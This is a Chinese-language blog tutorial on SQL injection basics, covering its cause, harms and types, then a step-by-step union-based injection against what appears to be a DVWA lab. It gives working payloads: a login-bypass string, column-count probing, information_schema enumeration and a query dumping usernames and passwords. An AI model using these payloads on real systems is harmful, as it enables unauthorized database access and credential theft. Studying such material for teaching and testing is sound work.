03. SQL注入漏洞基础

最新推荐文章于 2024-08-09 10:31:32 发布
最新推荐文章于 2024-08-09 10:31:32 发布
阅读量633 收藏 2
点赞数 1
文章标签: sql 数据库 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43909650/article/details/128342790
版权

03. SQL注入漏洞基础

SQL注入漏洞基础(上)

/01 SQL注入的原理
SQL注入原理
SQL注入产生的原因

当Web应用向后台数据库传递SQL语句进行数据库操作时。如果对用户输入的参数没有经过严格的过滤处理,那么攻击者就可以构造特殊的SQL语句,直接输入数据库引擎,获取或修改数据库中的数据。

在这里插入图片描述

SQL注入的本质

把用户输入的数据当作代码来执行,违背了“数据与代码分离”的原则

SQL注入的两个关键点
  1. 用户能够控制输入的内容;
  2. Web应用把用户输入的内容带入到数据库中执行

在这里插入图片描述

/02 SQL注入的危害
SQL注入的危害

  • 盗取网站的敏感信息

  • 绕过网站后台认证

    后台登录语句:

    SELECT * FEOM admin WHERE username = 'user' and password = 'pass'

    万能密码:’ or ‘1’ = ‘1’ #

  • 借助SQL注入漏洞提权获取系统权限

  • 读取文件信息

/03 SQL注入的分类
SQL注入的分类

根据注入位置分类:GET型、POST型、Head头注入

根据反馈结果分类:有回显(显错注入)、无回显(盲注)

根据数据类型分类**(我们更加关注)**:

​ 数字型:输入的参数为整型,入id、年龄、页码等

​ 字符型:输入的参数为字符串

数字型与字符型最大的区别在于:数字型不需要单引号闭合,而字符串型一般需要单引号闭合

/04 SQL注入的流程
SQL注入的流程
1、寻找注入点

在这里插入图片描述

2、判断闭合方式

?id=1asdfa

有报错:数字型,无闭合或 )闭合

无报错:字符型,再判断闭合方式,’ “ ‘)“)

在这里插入图片描述

SQL注入漏洞基础(下)

2、判断闭合方式(续)

?id=1asdfa’

查看报错信息,这里的闭合方式为’

在这里插入图片描述

3、验证漏洞

?id=1’ or 1=1 # 正常显示

在这里插入图片描述

4、判断列数及回显位

?id=1’ ) order by 4 #

?id=1’ ) order by 3 #

说明列数为2列

在这里插入图片描述

在这里插入图片描述

?id=-1’ ) union select 1, 2#

说明回显位为1,2

在这里插入图片描述

联合查询下,两个select一定要相同字段数量

sql注入流程:

  1. 查询数据库类型:通过错误显示,已经知道是mysql

  2. 查询当前系统所使用的数据库名称是什么:dvwa

    在这里插入图片描述

    select * from 表名 where id = '1' union select 1, database()#

  3. 查询当前数据库的表有什么内容:

    information_schema查询表名

    0' union select 1, table_name from information_schema.tables where table_schema = 'dvwa

  4. 查询指定表的字段信息:

    information_schema查询字段信息

    0' union select 1, group_concat(column_name) from information_schema.columns where table_name = 'users

  5. 查询想要的信息内容:

    0' union select user, password  from users#
程序员小勇
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
万户 ezOFFICE DocumentEdit.jsp SQL注入漏洞复现
0xSec
12-10 1216
万户 ezOFFICEDocumentEdit.jsp 存在SQL注入漏洞。由于'DocumentID'参数缺乏过滤,允许攻击者利用漏洞获取数据库敏感信息。
SQL注入基础.pdf
07-05
介绍SQL注入的原理,常见入侵与防御方式,手工注入或者工具注入
网络安全——SQL注入漏洞
weixin_54055099的博客
09-08 1万+
SQL注入基本知识和SQL注入基本流程,sqli-labs
常见的一些SQL注入漏洞类型
Loser5的博客
03-14 6079
刚接触SQL注入不久,整理了一些常见的漏洞类型和相关漏洞的演示过程。
web基础漏洞SQL注入漏洞
m0_62274649的博客
10-04 971
sql漏洞基础,仍需完善
基础漏洞SQL注入漏洞
m0_59343440的博客
01-16 994
SQL注入简介 定义:SQL注入是将Web页面的原URL、表单域或数据包输入的参数,修改拼接成SQL语句,传递给Web服务器,进而传给数据库服务器以执行数据库命令。如Web应用程序的开发人员对用户所输入的数据或cookie等内容不进行过滤或验证(即存在注入点)就直接传输给数据库,就可能导致拼接的SQL被执行,获取对数据库的信息以及提权,发生SQL注入攻击。 原理:将用户的输入插入到SQL语句中,用户的输入被当做代码执行 SQL注入分类 1、参数类型分类 数字型注入: 类似结构 http://xx
漏洞复现】用友时空KSOA PrintZPYG.jsp SQL注入漏洞
siu~
08-01 409
用友时空KSOA系统 PrintZPYG.jsp.jsp接口处存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
sql注入详解
热门推荐
good good study
05-05 20万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
SQL注入漏洞检测
Kali与编程
12-10 1273
SQL注入漏洞是一种常见的安全漏洞,渗透测试工程师需要掌握SQL注入漏洞的检测技术,以便在测试中及时发现和利用漏洞。常见的注入点包括GET参数、POST参数、Cookie、HTTP头部信息和用户名密码等,常见的注入方式包括基于错误的注入、基于联合查询的注入、基于布尔盲注的注入、基于时间盲注的注入和基于报错盲注的注入等。本文将从渗透测试工程师的角度,详细介绍SQL注入漏洞的检测基础,包括常见的注入点、注入方式、手工注入和自动化注入等。常见的SQL注入技术包括基于错误的注入、基于时间的注入、联合查询注入等。
SQL注入-01】SQL语句基础SQL注入漏洞原理及分类
m0_64378913的博客
04-23 5699
目录1 SQL注入概述1.1 SQL注入简介1.2 SQL注入原理(掌握)1.3 SQL注入漏洞的危害(掌握)2 SQL注入漏洞分类2.1 注入位置分类(掌握)2.2 注入数据类型分类(掌握)2.3 注入手法分类(掌握)3 SQL语句基础3.1 简介3.2 注释3.3 MySQL数据库 information_schema 内容简介3.4 MySQL 常用函数4 总结参考文献 1 SQL注入概述 1.1 SQL注入简介 定义:SQL注入就是指Web应用程序对用户输入数据的合法性没有判断,前端传
SQL注入基础和进阶.pdf
12-26
例如,如果输入的参数是user_id=1,攻击者可以构造SQL语句,例如,user_id=1',那么如果存在SQL注入漏洞数据库就会报错。 SQL注入漏洞有两种类型:数字型和字符型。数字型的判断方法是查看源代码,根据输出语句...
自己动手编写SQL注入漏洞扫描工具
03-30
本教程旨在介绍如何自己动手编写一个SQL注入漏洞扫描工具,帮助你理解和预防这种攻击。 首先,理解SQL注入的基本原理至关重要。当用户输入的数据被直接拼接到SQL查询中时,如果应用程序没有进行足够的验证和转义,...
SQL 注入天书.pdf
08-06
SQL注入是一种常见的网络安全漏洞,发生在应用程序使用用户输入的SQL代码直接构建数据库查询时。当攻击者能够通过输入恶意SQL语句来控制或篡改数据库查询,他们就能获取敏感信息、修改数据甚至完全控制系统。《SQL...
SQL Server中CPU使用率过高的排查
主宰
08-05 300
如果sqlserver进程导致CPU使用率过高,则最常见的原因是执行表或索引扫描的查询,其次是排序、哈希操作和循环 (嵌套循环运算符或 WHILE (T-SQL) )。对于安装了sqlserver的服务器,可以先看下任务管理器中sqlserver对cpu的占用情况,确定是否是sqlserver导致cpu消耗过高。从输出中具有最高improvement_measure值的前5或10条建议开始。这些索引对性能有最显著的积极影响。使用以下查询检查是否缺少索引,并应用具有高改进度量值的任何建议索引。
SQL回顾
Wincreds的博客
08-05 437
②Cookie 是一种客户端的存储技术,用于在浏览器中存储少量数据。参数包含在请求体中,可以是键值对格式或其他格式,如 JSON。①Session 是一种服务器端的存储技术,用于在用户与网站的交互期间保持用户状态。会话数据通常存储在服务器上的文件或数据库中,可以永久存储用户信息,直到会话过期或被清除。会看到结果,正确密码,与其他的长度不一样,由于网站机制,防爬机制,这里我把密码从666改为了8,节约访问次数。旧密码无所谓,利用 admin’# ,进行修改,修改密码实际上修改的是admin的密码。
SQL Server 事务
a876106354的博客
08-09 324
SQL Server 事务是数据库操作的一个基本特性,它允许你将一系列数据库操作组合成一个原子单元,这个单元中的所有操作要么全部成功,要么全部失败。事务具有以下四个重要的属性,通常被称为ACID属性。
[SWPUCTF 2021 新生赛]easy_sql
2301_80218721的博客
08-05 369
这个文章讲的东西基本可以够我去理解一些基本的思路和做法,然后文章里面还附带了一些基本的演示。然后我这里直接就是照着那个文章的思路去写的题目。转web之后第一次做sql,还不是很懂。然后就得到了flag。
SQL Zoo 8+.NSS Tutorial
最新发布
weixin_61524392的博客
08-09 441
以下数据来自。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值